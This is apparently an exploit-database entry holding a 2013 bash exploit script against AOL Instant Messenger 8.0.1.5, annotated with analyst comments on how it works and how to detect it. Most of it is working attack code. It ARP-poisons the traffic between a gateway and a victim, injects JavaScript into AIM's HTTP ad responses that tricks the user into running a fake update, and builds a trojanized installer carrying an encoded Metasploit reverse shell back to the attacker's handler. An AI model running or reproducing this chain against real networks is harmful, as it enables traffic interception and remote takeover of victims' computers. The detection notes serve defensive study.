AOL Instant Messenger 8.0.1.5 Binary Planting



EKU-ID: 3350 CVE: OSVDB-ID:
Author: Marshall Whittaker Published: 2013-07-09 Verified: Verified


#!/bin/bash

### AOL Instant Messenger 8.0.1.5 (Jul 2013) Exploit Windows XP/7 tested and working.
### Leverages binary file planting to My Documents via AIM's advertisement code.
### Little social engineering built in using javascript to try to get them to run the AIM_Install.exe.
### Starts a reverse shell back to your handler on 192.168.2.5:443 by default.

### Marshall Whittaker

# NOTE(review): reading notes for analysts. The attack chain visible in this
# file is: (1) generate and compile an ettercap filter that rewrites AIM's
# plain-HTTP ad responses to carry an injected <script>, (2) wrap a Metasploit
# reverse_tcp stage into a copy of the AIM installer, (3) ARP-poison the
# victim/gateway pair so the filtered traffic reaches the victim, (4) run a
# handler for the callback.
#
# Script hygiene: there is no `set -e`/`set -u`, no `|| exit`, no `trap`, and no
# expansion is quoted; every step continues even if the previous one failed.
# The hard-coded values contain no whitespace, which is the only reason the
# unquoted expansions work.
#
# The header says the handler is on 192.168.2.5:443, but below ATTACKER is
# 192.168.2.10 and 192.168.2.5 is VICTIM; the variables are what the commands
# actually use, so the header appears stale.

# LHOST for the payload and for the handler (L41/L45).
ATTACKER="192.168.2.10";
# Second ettercap target group — the host whose traffic is intercepted (L44).
VICTIM="192.168.2.5";
# First ettercap target group (L44).
GATEWAY="192.168.2.1";
# LPORT; TCP/443 is used, but reverse_tcp is a plaintext shell, not TLS — a
# 443 flow with no TLS handshake is a detection signal.
REVPORT="443";
# URL the injected script sends the victim's browser to; presumably hosts the
# trojanized installer produced by L41 (comments at L42-43 imply a manual
# upload step that is not automated here).
PAYLOADSITE="https://dl.dropboxusercontent.com/s/dykenlhdobchjjv/AIM_Install.exe?token_hash=AAE2qGWSZAlAWJKepUu_2fP5UZfg-JTHktBGuu-I4BV34Q&dl=1";

# Build the ettercap filter source line by line (no error check if ~/aimpwn
# already exists or cannot be created).
mkdir ~/aimpwn;
# Match only HTTP responses (source port 80) ...
echo "if (tcp.src == 80) {" > ~/aimpwn/aimpwn.filter;
# ... whose payload contains the string "atwola" (the marker the author uses
# to pick out AIM's ad content; the filter matches any packet with this
# substring, not only AIM's).
echo "if (search(DATA.data, \"atwola\")) {" >> ~/aimpwn/aimpwn.filter;
# Rewrite the literal `_blank>` into `_blank><script>…</script>`: an alert
# claiming a new version is available, a redirect to PAYLOADSITE, then after
# 1 s a second alert instructing the user to run AIM_Install from My
# Documents. $PAYLOADSITE is expanded by bash here, so the URL is baked into
# the filter at generation time. Because the match is on plain HTTP, serving
# ad content only over TLS (or pinning/HSTS) removes this injection point.
echo "replace(\"_blank>\", \"_blank><script>alert('A new version of AOL Instant Messenger is available!');window.location = '$PAYLOADSITE'; setTimeout(function(){alert ('Navigate to your My Documents folder and start the installer by clicking AIM_Install and follow the steps.');}, 1000);</script>\");" >> ~/aimpwn/aimpwn.filter;
# Console message on the ettercap side for each rewritten packet.
echo "msg(\"PWNT.\n\");" >> ~/aimpwn/aimpwn.filter;
echo "}" >> ~/aimpwn/aimpwn.filter;
echo "}" >> ~/aimpwn/aimpwn.filter;
# Compile the filter to ettercap's binary format (.ef), loaded at L44.
etterfilter ~/aimpwn/aimpwn.filter -o ~/aimpwn/aimpwn.ef;
### wget section.
#wget http://download.newaol.com/aim/win/AIM_Install.exe -O ~/aimpwn/AIM_Install.exe;
# Copies the genuine installer into Metasploit's template directory. With the
# wget line above commented out, ~/aimpwn/AIM_Install.exe must already exist
# from an earlier run, otherwise this cp fails and the script carries on.
cp ~/aimpwn/AIM_Install.exe /opt/metasploit/apps/pro/msf3/data/templates/;
# Generate the reverse_tcp stager, pass it through three raw encoder stages,
# then embed it into the installer via `-x AIM_Install.exe` (bare name;
# presumably resolved against the templates dir populated by L40 — confirm).
# The output overwrites ~/aimpwn/AIM_Install.exe, so the original vendor
# installer is lost after this line. For defenders: the resulting file no
# longer matches the vendor's hash and will not carry a valid Authenticode
# signature, which is the simplest host-side check for a planted installer.
msfpayload windows/shell/reverse_tcp LHOST=$ATTACKER LPORT=$REVPORT R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -x AIM_Install.exe -t exe -e x86/call4_dword_xor -c 2 -o ~/aimpwn/AIM_Install.exe;
### Uncomment wget section and put code to upload AIM_Install.exe to a site if you need to
### change ATTACKER IP or port.
# ARP MITM (text UI, quiet, compiled filter) between GATEWAY and VICTIM,
# backgrounded with no PID capture or trap, so it outlives the handler below
# unless stopped by hand. On the wire this looks like the gateway's MAC
# changing in the victim's ARP cache — arpwatch-style monitoring or dynamic
# ARP inspection on the switch catches it.
ettercap -T -F ~/aimpwn/aimpwn.ef -q -M arp:remote /$GATEWAY/ /$VICTIM/ &
# Foreground handler for the callback (E = execute). Expected network
# indicator: a new outbound TCP/$REVPORT connection to $ATTACKER from the
# installer process in the victim's My Documents folder.
msfcli exploit/multi/handler payload=windows/shell/reverse_tcp lhost=$ATTACKER lport=$REVPORT E;